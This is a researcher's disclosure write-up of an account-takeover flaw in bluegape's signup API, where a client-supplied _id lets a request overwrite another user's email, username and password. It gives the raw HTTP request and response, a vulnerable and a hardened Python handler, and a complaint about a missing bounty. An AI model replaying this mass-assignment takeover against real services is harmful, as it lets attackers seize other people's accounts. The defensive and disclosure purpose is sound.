So, while signing up on the website through social media (Facebook), I found that a lot of requests were being made to the site carrying the registered Facebook user's data: name, profile link, Facebook profile image, username, password, accessToken, gender, email, etc.
So, just for fun, I changed all the info to Mark Zuckerberg's information and it was all accepted. Then I went to the site and saw that the username field was disabled and I was unable to set it, so I went back to the request, changed the username to "zuck", and boom, it worked. Then I saw there was another parameter, _id, but it was encrypted, so I just created another account, got its id, replaced the info, and I was able to take over the other account.
Here’s the request :
POST /auth/signup HTTP/1.1
Host: publicapi5.bluegape.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://bluegape.com/
Content-Length: 611
Origin: http://bluegape.com
Cookie: _ga=GA1.2.1308041597.1441653308; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{
  "fullName": "Nirmal Tamang",
  "firstName": "Nirmal",
  "lastName": "Tamang",
  "facebook": {
    "id": "10101640953722381",
    "accessToken": "[removed]",
    "profileUrl": "https://www.facebook.com/app_scoped_user_id/809814902389523/"
  },
  "email": "[email protected]",
  "gender": "male",
  "avatar": "https://graph.facebook.com/809814902389523/picture?width=400",
  "_id": "55c8bf5e0c8b3cdceb794e70",
  "bluegape": {
    "username": "nirmaltamang1",
    "password": "nepal@123"
  }
}
Response:
{"success":true,"data":{"token":"removed","user":{"_id":"55c8bf5e0c8b3cdceb794e70","mysqlId":6220,"email":"[email protected]","fullName":"Nirmal Tamang","firstName":"Nirmal","bluegape":{"username":"nirmaltamang1","password":"d0691c8a12ee2656d49229c5c25a656848168fb5"},"created":"2015-10-03T20:03:16.502Z","slug":"nirmaltamang1","cover":"http://cdn.bluegape.com/wp-content/uploads/2015/02/16182601/wallhaven-113377.jpg","google
So I just have to change the email, username and password of that _id and his/her account can be accessed with my new credentials. 🙂 You might be thinking it's hard to find the user id since it is encrypted, but it's easy to find the user id of any user just by visiting their profile.
So, if we just replace the user id with this Maruti id and give it a new email and username, then we can take over this account just by making an API request.
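To make the root cause concrete, here is an added example (not bluegape's code) of a signup handler that trusts the client-supplied _id and overwrites whatever record it names, next to a hardened version that allow-lists fields, mints the id server-side, and refuses duplicate usernames or emails. The in-memory store, the victim record and the field names are constructed from the request shown above.

```python
import hashlib
import secrets
from copy import deepcopy

# Constructed in-memory "database" standing in for the real user store.
# The victim record uses the _id seen in the request on this page.
def make_store():
    return {
        "55c8bf5e0c8b3cdceb794e70": {
            "email": "victim@example.com",
            "bluegape": {"username": "victimuser", "password": "<hash>"},
        }
    }

def signup_vulnerable(store, payload):
    """Mass assignment: the client-supplied _id selects the record and the
    whole payload is written into it, so an existing user's email, username
    and password are replaced by whoever sends the request."""
    user_id = payload.get("_id") or secrets.token_hex(12)
    record = store.setdefault(user_id, {})
    record.update(deepcopy(payload))  # _id and every other field accepted as-is
    return user_id

# Only these top-level fields may be set by a signup request.
ALLOWED_TOP = {"fullName", "firstName", "lastName", "email", "gender", "avatar"}

def hash_password(pw):
    salt = secrets.token_hex(8)
    return salt + ":" + hashlib.sha256((salt + pw).encode()).hexdigest()

def signup_hardened(store, payload):
    """Allow-list the fields, mint the id on the server, never reuse an
    existing username or email, and return only the new id (no password
    hash echoed back in the response)."""
    username = payload["bluegape"]["username"]
    email = payload["email"]
    for rec in store.values():
        if rec["email"] == email or rec["bluegape"]["username"] == username:
            raise ValueError("username or email already registered")
    record = {k: payload[k] for k in ALLOWED_TOP if k in payload}
    record["bluegape"] = {
        "username": username,
        "password": hash_password(payload["bluegape"]["password"]),
    }
    user_id = secrets.token_hex(12)  # any client-supplied _id is ignored
    store[user_id] = record
    return user_id
```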
Here's the video PoC:
Bluegape Vulnerability: Hacking Any bluegape Account, from Naresh LamGade on Vimeo.
I reported this bug to the bluegape team and they confirmed it was a bug, but they didn't respond to me after that. They made a patch but didn't even email me about it. I was hoping for a good bounty, as it was quite a big and popular website.
Last time, when I reported the XSS on their site, they awarded me a small bounty, but now, when the bug was critical, they didn't respond to me. It would have been fine if they had told me and thanked me for the issue. I am really, really disappointed with bluegape.